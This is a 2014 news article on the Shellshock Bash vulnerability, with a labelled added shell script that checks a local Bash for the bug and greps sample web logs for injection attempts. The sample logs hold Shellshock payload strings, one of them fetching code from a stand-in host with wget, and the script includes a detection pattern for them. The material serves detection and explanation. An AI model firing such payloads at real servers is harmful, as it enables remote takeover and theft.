
Bash is even worse than Heartbleed, and you can’t do anything about it

Published Sep 25th, 2014 2:05PM EDT
Bash vs Heartbleed Security Flaw


A few months ago, a serious security issue affecting millions of websites was discovered – Heartbleed – and subsequently patched by many of them, but it looks like that wasn’t the worst security scare for Internet users this year. CNET reports that a new security vulnerability has been found, the “Bash” or “Shellshock” bug, which could be even more serious than Heartbleed because it can affect a variety of Internet-connected devices, from computers to Internet-of-Things gadgets. And apparently, this huge flaw will not be easily fixed.


The Bash bug lets attackers run commands of their choosing on an affected system, which in turn lets them take it over and steal confidential information, and the flaw appears to have been present in Bash for around 25 years.

The bug affects any system that ships Bash, which is the default shell on most Linux distributions and on OS X, and which is also built into many routers, appliances and other embedded devices. Windows does not include Bash unless a Unix-compatibility environment such as Cygwin has been installed. The problem lies in how Bash imports its environment: a variable whose value looks like a function definition is parsed as one, and commands appended after the function body are executed as soon as the shell starts. Because many programs (for example web servers running CGI scripts) start a shell with attacker-influenced values in its environment, an attacker can often trigger the bug remotely without ever logging in. Regular Internet users can't do much except install vendor updates as they appear, and for many embedded devices that update may never come.
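The mechanism described above, as an added example that is not part of the BGR article: a POSIX shell script that tests the local Bash binary for the environment-variable injection (CVE-2014-6271) in the way the public test command did, and then greps a few constructed web-server log lines for the `() {` marker that remote exploitation attempts against CGI scripts leave behind. The log lines, IP addresses and paths are made up for the example.

```shell
#!/bin/sh
# Added example (not from the article): local Shellshock check plus a
# signature grep over constructed access-log lines.

# Pre-fix Bash imported any environment variable whose value began with
# "() {" as a function definition and kept parsing past the closing brace,
# so commands appended after the function body ran at shell start-up.
# Prints "vulnerable" if the appended command ran, "patched" if it did not,
# and "no-bash" if there is no bash binary to test.
check_shellshock() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    # The payload lives in an environment variable named "x"; the bash -c
    # body itself is harmless. stderr is dropped because a half-patched
    # bash prints a warning about the ignored function definition.
    out=$(env x='() { :;}; echo SHELLSHOCK_RAN' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_RAN*) echo "vulnerable" ;;
        *)                echo "patched" ;;
    esac
}

# Web servers running CGI copy request headers into environment variables
# (HTTP_USER_AGENT, HTTP_COOKIE, ...) before starting the handler, which is
# how the bug becomes reachable over the network. Attempts therefore show
# up in access logs as header values that start with "() {".
# CONSTRUCTED sample log (Apache combined format); two of the three lines
# carry an injection attempt in the User-Agent field.
CONSTRUCTED_LOG='203.0.113.5 - - [25/Sep/2014:14:05:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"id\""
198.51.100.7 - - [25/Sep/2014:14:06:11 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:14:07:22 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "-" "() { x;}; wget http://example.invalid/x"'

# $1: log text. Prints the number of lines containing the "() {" marker,
# which legitimate User-Agent or Referer values do not contain.
count_shellshock_attempts() {
    printf '%s\n' "$1" | grep -c '() *{'
}

# Prints the matching lines so an analyst can see source IP and payload.
show_shellshock_attempts() {
    printf '%s\n' "$1" | grep '() *{'
}

echo "local bash: $(check_shellshock)"
echo "exploit attempts in sample log: $(count_shellshock_attempts "$CONSTRUCTED_LOG")"
show_shellshock_attempts "$CONSTRUCTED_LOG"
```

The same grep run over real access logs (or the equivalent rule in an IDS) is the quickest way to see whether a CGI-exposed host has already been probed; a hit from the log check does not by itself mean the attempt succeeded, which is what the local check answers.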

“This vulnerability is potentially a very big deal,” security firm Rapid7’s engineering manager Tod Beardsley told CNET. “It’s rated a 10 for severity, meaning it has maximum impact, and ‘low’ for complexity of exploitation – meaning it’s pretty easy for attackers to use it.”

Beardsley continued, “The affected software, Bash, is widely used so attackers can use this vulnerability to remotely execute a huge variety of devices and Web servers. Using this vulnerability, attackers can potentially take over the operating system, access confidential information, make changes etc. Anybody with systems using bash needs to deploy the patch immediately.”

Security expert Robert Graham said that Shellshock is bigger than Heartbleed because the “bug interacts with other software in unexpected ways,” and because so many programs hand work off to the shell. The bug could affect entire networks, and exploitation attempts are not picked up by existing security systems.

“Scan your network for things like Telnet, FTP, and old versions of Apache (masscan is extremely useful for this). Anything that responds is probably an old device needing a Bash patch. And, since most of them can’t be patched, you are likely screwed,” Graham added.

Chris Smith Senior Writer
